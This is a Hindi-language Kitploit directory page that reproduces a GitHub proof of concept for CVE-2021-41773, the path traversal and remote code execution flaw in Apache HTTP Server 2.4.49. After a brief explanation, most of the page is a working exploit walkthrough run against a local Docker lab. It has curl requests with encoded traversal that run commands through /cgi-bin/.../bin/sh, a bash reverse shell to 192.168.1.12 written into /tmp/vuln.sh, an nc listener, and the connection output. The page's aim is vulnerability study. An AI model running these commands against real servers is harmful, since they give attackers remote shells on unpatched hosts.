Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41773 — CVE-2021-41773 पहचानकर्ता वाली पहली कमजोरी Apache HTTP Server 2.4.49 में मौजूद एक path traversal दोष है। | Kitploit
उपकरण/GitHubGitHub/ludovicpatho/cve-2021-41773
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubludovicpatho/cve-2021-41773

CVE-2021-41773

CVE-2021-41773 पहचानकर्ता वाली पहली कमजोरी Apache HTTP Server 2.4.49 में मौजूद एक path traversal दोष है।

रिपॉजिटरी देखें
433 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773

🐛 Apache HTTP Server 2.4.49 में पाथ ट्रैवर्सल और फ़ाइल प्रकटीकरण भेद्यता

Apache HTTP Server 2.4.49 में पाथ नॉर्मलाइज़ेशन में किए गए बदलाव में एक दोष पाया गया। कोई हमलावर पाथ ट्रैवर्सल हमले का उपयोग करके URL को Alias-जैसे निर्देशों द्वारा कॉन्फ़िगर की गई निर्देशिकाओं के बाहर की फ़ाइलों से मैप कर सकता है।

यदि इन निर्देशिकाओं के बाहर की फ़ाइलें सामान्य डिफ़ॉल्ट कॉन्फ़िगरेशन "require all denied" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। यदि इन aliased पथों के लिए CGI स्क्रिप्ट भी सक्षम हैं, तो यह दूरस्थ कोड निष्पादन की अनुमति दे सकता है।

यह समस्या वास्तविक दुनिया में शोषण किए जाने के लिए जानी जाती है।

यह समस्या केवल Apache 2.4.49 को प्रभावित करती है, पहले के संस्करणों को नहीं।

स्रोत

पाथ ट्रैवर्सल

अवलोकन

पाथ ट्रैवर्सल हमला (जिसे डायरेक्टरी ट्रैवर्सल भी कहा जाता है) वेब रूट फ़ोल्डर के बाहर संग्रहीत फ़ाइलों और निर्देशिकाओं तक पहुँचने का लक्ष्य रखता है। “डॉट-डॉट-स्लैश (../)” अनुक्रमों और उनके रूपांतरों के साथ फ़ाइलों को संदर्भित करने वाले चरों में हेरफेर करके या निरपेक्ष फ़ाइल पथों का उपयोग करके, फ़ाइल सिस्टम पर संग्रहीत मनमानी फ़ाइलों और निर्देशिकाओं तक पहुँच संभव हो सकती है, जिसमें एप्लिकेशन स्रोत कोड या कॉन्फ़िगरेशन और महत्वपूर्ण सिस्टम फ़ाइलें शामिल हैं। यह ध्यान दिया जाना चाहिए कि फ़ाइलों तक पहुँच सिस्टम परिचालन अभिगम नियंत्रण द्वारा सीमित है (जैसे कि Microsoft Windows ऑपरेटिंग सिस्टम पर लॉक या उपयोग में मौजूद फ़ाइलों के मामले में)।

यह हमला “dot-dot-slash”, “directory traversal”, “directory climbing” और “backtracking” के नाम से भी जाना जाता है।

प्रूफ ऑफ कॉन्सेप्ट

PoC वातावरण सेट अप करें

root@kitploit:~
$ docker-compose build
$ docker-compose up

पुष्टि करें कि यह काम करता है

root@kitploit:~
$ curl http://localhost:1234
<html><body><h1>It works!</h1></body></html>

एक्सप्लॉइट

पीड़ित : localhost:1234
हमलावर : 192.168.1.12

दस्तावेज़ के अनुसार, यह एक दोष है जो हमें दूरस्थ रूप से कोड निष्पादित करने (RCE) की अनुमति देता है।
हम cgi-bin फ़ोल्डर के साथ curl चलाकर इसका शोषण कर सकते हैं।

root@kitploit:~
$ curl 'http://<victim_ip>/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; <command>'
  • 1. RCE
    आइए देखें कि क्या हमारे पास वास्तव में कमांड तक पहुँच है, जैसे id :

    root@kitploit:~
    $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; id'
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    
  • 2. रिवर्स शेल
    हम पीड़ित के सर्वर पर एक bash फ़ाइल बनाकर रिवर्स शेल का परीक्षण करेंगे।
    उदाहरण के तौर पर, PayloadsAllTheThings रिपॉजिटरी में मौजूद bash रिवर्स शेल को लेते हैं।

    यहाँ एक उदाहरण है :
    bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

    आइए पीड़ित की मशीन पर /tmp/ फ़ोल्डर में vuln.sh फ़ाइल बनाएँ!
    इस फ़ाइल में हमारा रिवर्स शेल होगा जिसे हम दूरस्थ रूप से चला सकते हैं। यह पोर्ट 44 पर हमारी स्थानीय मशीन से कनेक्ट होगा।

    root@kitploit:~
    $  curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; echo "#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.12/44 0>&1" > /tmp/vuln.sh'
    

    आप cat कमांड से फ़ाइल की सामग्री देख सकते हैं

संदर्भ

  • https://httpd.apache.org/security/vulnerabilities_24.html
  • https://github.com/apache/httpd/commit/98246aa96079dad5f7b20521bbc0142a04f1c5e7
टूल डाउनलोड करें
root@kitploit:~
$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; cat /tmp/vuln.sh'
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.12/44 0>&1
  • 3. ncat के साथ लिसनर
    आइए स्थानीय मशीन पर लिसनर बनाएँ।

    root@kitploit:~
    $ nc -lvnp 44
    

    अब केवल दूरस्थ फ़ाइल को निष्पादित करना शेष है।

    root@kitploit:~
    $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:
    text/plain; echo; bash /tmp/vuln.sh'
    

    प्रतिक्रिया :

    root@kitploit:~
    Ncat: Version 7.91 ( https://nmap.org/ncat )
    Ncat: Listening on :::44
    Ncat: Listening on 0.0.0.0:44
    Ncat: Connection from 172.19.32.1.
    Ncat: Connection from 172.19.32.1:58963.